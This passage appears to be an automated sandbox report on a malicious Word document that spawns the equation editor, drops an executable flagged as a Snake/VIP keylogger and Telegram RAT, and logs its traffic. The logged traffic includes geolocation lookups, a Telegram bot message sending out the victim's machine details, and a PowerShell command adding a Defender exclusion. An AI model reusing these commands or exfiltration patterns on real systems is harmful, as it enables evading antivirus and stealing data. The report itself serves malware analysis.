2024-10-30 07:25:19 UTC	889	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:19 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21142 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hHUhpwSf1IjrH3%2BiB8GZtJRupZ7X1HeIKcp2rx6iDQABPe%2BHK4IZiTahe5%2BkLIM6zej4uAKend%2BRjYzMoKCFURh56jFHKjd2giqNbkUAB4Z3byuHhzZfj%2FBBqnWQuPmSp3176VOq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9abb6aa024690-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1191&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2164424&cwnd=239&unsent_bytes=0&cid=64cbe1b7ce9e5634&ts=160&x=0"
2024-10-30 07:25:19 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49168	188.114.97.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:21 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:21 UTC	889	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:21 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21144 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIECEQuOCzU16jFJxycHMKySl5bC%2FtsI%2FXn8%2BYBYs0w8RVlPM3SFtjaSUumdJvJN4SCgh1Hg%2Bl013jS9GknxMcNEiymfIH7xH3vyOQ1blx%2FaXnWHvD2WNtK8A9gCKXOWdBYLt5rV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9abc13fc43464-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2533683&cwnd=251&unsent_bytes=0&cid=2c7e8fd35a7dc829&ts=156&x=0"
2024-10-30 07:25:21 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49170	188.114.97.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:27 UTC	63	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-30 07:25:27 UTC	889	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:27 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21150 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62lTI5GLAA4y4t1N3tskxwMDA%2FfMt3UrpKFL77%2BrpEE6O6w6JdBwRUx3%2FddxmruHBMrszEm3cidiAtqxbIXLwoOFS7%2FTqdDpzDbSTm%2BXephKMQHAFVur3IA0iScQXN8sRDnvUIDC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9abe96b226b61-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1233&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2721804&cwnd=251&unsent_bytes=0&cid=86f65a2f05fe7804&ts=147&x=0"
2024-10-30 07:25:27 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49172	188.114.97.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:30 UTC	63	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-30 07:25:30 UTC	889	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:30 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21153 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpVeR3NpI8vC%2BK1SrTi6Q4waSMIzpBQ55aalt2uENqafuqlumBLnqhTDwYddMG9Vw7P2jsK1hjIjjA1M2gUzF%2BPmUl0K0mpOG7HLarchJL49%2F5g%2BWyTueN9vvcy%2BOM0jrAer9K5m"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9abfa6b442e1e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1635234&cwnd=251&unsent_bytes=0&cid=67beff9019cf0d67&ts=148&x=0"
2024-10-30 07:25:30 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49174	188.114.97.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:34 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:34 UTC	895	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:34 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21157 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6zE%2FK9Nx6nIx4SmgLgFBhb1aNr8OLJMm%2FiV8T%2Bb%2B1WvHWFvQCq5Cx%2Bt%2BodJ2y2Yn5HY6lkFJ7lE52ZGMzmiHVfLn7SxfT%2B3hHql3Ng4Bu6EBN2k4IuboKhYY78um3q4xRXYYf%2BDt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9ac120ae9e8fd-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1052&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2752851&cwnd=251&unsent_bytes=0&cid=d3c7a06912856aeb&ts=148&x=0"
2024-10-30 07:25:34 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49176	188.114.96.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:38 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:38 UTC	887	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:38 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21161 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E23ZzH7cQkDau7ETJEfkYX52yowJE7eXMfc6TYtQ2kXBk0BiEAJ7jDRt2ybAELgtVaBWTRG6T2mJYzn3RmfGFYJUX28O9a%2FoUlr4Sde2tSMm%2Bbx%2BX987zC86vgCk7DVWZl%2F3I6kZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9ac292911e756-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1966055&cwnd=251&unsent_bytes=0&cid=1587483bde6351db&ts=148&x=0"
2024-10-30 07:25:38 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49178	188.114.96.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:40 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:40 UTC	887	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:40 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21163 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qt%2FLHoXZUo%2BfOpRoRcjRotJLqehbMXU%2Fmdi%2BAEf98EWa198NkZM9LBlH2cr5OzPWXyas3bFO5Nx56TLhAE3LrpGTWwwXtXCkQ1N4Er3MPKkcn5TixLLU3rRUTWQYnCwYVuoNuHT1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9ac373b95e5ca-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2375717&cwnd=251&unsent_bytes=0&cid=a2df41f175d774da&ts=154&x=0"
2024-10-30 07:25:40 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49180	188.114.97.3	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:43 UTC	87	OUT	GET /xml/173.254.250.78 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-30 07:25:43 UTC	887	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 07:25:43 GMT Content-Type: text/xml Content-Length: 359 Connection: close apigw-requestid: AcLvmhW3vHcESEw= Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 21166 Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=07MAmowk21Je3gk57I3jkZ%2BPOpnlI8ZYPG8CCfVFBU5RZeXcvIw8QvqZ5dwc0d6ajwQwgQMB%2BUihXsUipOno7AtD32cjTX8OoP%2Fdpz2Dvjh0fNqU18Ox6nhL99xkp5i90Q%2B6F96f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da9ac49ccf46c68-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1658648&cwnd=251&unsent_bytes=0&cid=bf250d78738a28de&ts=154&x=0"
2024-10-30 07:25:43 UTC	359	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49181	149.154.167.220	443	3572	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-30 07:25:45 UTC	353	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-30 07:25:46 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 30 Oct 2024 07:25:46 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-30 07:25:46 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	03:24:58
Start date:	30/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13fba0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	03:24:59
Start date:	30/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:25:03
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Imagebase:	0x1180000
File size:	755'712 bytes
MD5 hash:	06A6B60A72D4C7A394B8345EE8047851
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:25:09
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Imagebase:	0x1220000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:25:09
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
Imagebase:	0x1180000
File size:	755'712 bytes
MD5 hash:	06A6B60A72D4C7A394B8345EE8047851
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

